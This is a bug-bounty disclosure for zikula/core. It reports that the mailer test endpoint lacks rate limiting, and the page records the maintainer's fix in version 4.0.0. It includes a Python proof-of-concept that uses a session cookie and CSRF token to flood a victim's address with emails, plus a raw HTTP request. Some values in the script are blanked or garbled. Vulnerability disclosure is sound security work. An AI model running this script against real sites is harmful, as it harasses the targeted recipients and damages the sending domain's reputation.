Insufficient Granularity of Access Control in zikula/core


Reported on

Jan 3rd 2022


When sending test emails, you're able to spam a target email address with as many emails as an attacker wants to a victim's email address due to lack of rate limiting (/mailer/config/test) I've put together a simple Python script that exploits this and would allow you to send a custom amount of emails to any victim's email address.

Proof of Concept

# Example usage: python3 -csrf "JHja3y8NfO1LWy0UiJ4sC6NxzQoc064tCLQVko6PSj4" -cookie "sqrv94auln8thq23032rflgjc8" -subject "test" -message "test" -email ""

import requests, argparse

def spammer(csrfToken, cookie, email, subject, message):
    data = {
        "zikulamailermodule_test[toName]": "Test",
        "zikulamailermodule_test[toAddress]": email,
        "zikulamailermodule_test[subject]": subject,
        "zikulamailermodule_test[messageType]": "text",
        "zikulamailermodule_test[bodyHtml]": "",
        "zikulamailermodule_test[bodyText]": message,
        "zikulamailermodule_test[test]": "",
        "zikulamailermodule_test[_token]": csrfToken
    headers = {
    "Host": "",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": str(len(data)),
    "Origin": "",
    "DNT": "1",
    "Connection": "keep-alive",
    "Referer": "",
    "Cookie": "_zsid=" + cookie,
    "Upgrade-Insecure-Requests": "1",
    "Sec-GPC": "1",
    "TE": "Trailers",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"}
    r ="", headers=headers, data=data)

parser = argparse.ArgumentParser()
parser.add_argument("-csrf", "--csrf-token", required=True, help="Your CSRF token.")
parser.add_argument("-cookie", "--cookie", required=True, help="Your session cookie")
parser.add_argument("-email", "--email", required=True, help="The victim email address")
parser.add_argument("-subject", "--subject", required=True, help="The subject line of the email")
parser.add_argument("-message", "--message", required=True, help="the message of the email")
arguments = parser.parse_args()

# Increase this number within parenthesis to increase the number of emails sent
for i in range(10):
    spammer(arguments.csrf_token, arguments.cookie,, arguments.subject, arguments.message)


POST /mailer/config/test HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
DNT: 1
Connection: keep-alive
Cookie: _zsid=4pl4j2sj5m5ee4csbcsq9saqjh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0


The impact of this will be negative on the targeted email address and also negative on the domain (and other domains when the web application is hosted using another domain and emails are sent from a different domain) since it's possible that the victim would report the domain as a spam domain, resulting in a reputational damage to the domain.

We are processing your report and will contact the zikula/core team within 24 hours. 2 years ago
We have contacted a member of the zikula/core team and are waiting to hear back 2 years ago
Axel Guckelsberger validated this vulnerability 2 years ago
1d8 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger marked this as fixed in 4.0.0 with commit 06dee1 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
2 years ago

Thanks for this report. Added rate limiting like you suggested. Note the fix is not applied to the demo page yet, as this is running an older version at the moment.

to join this conversation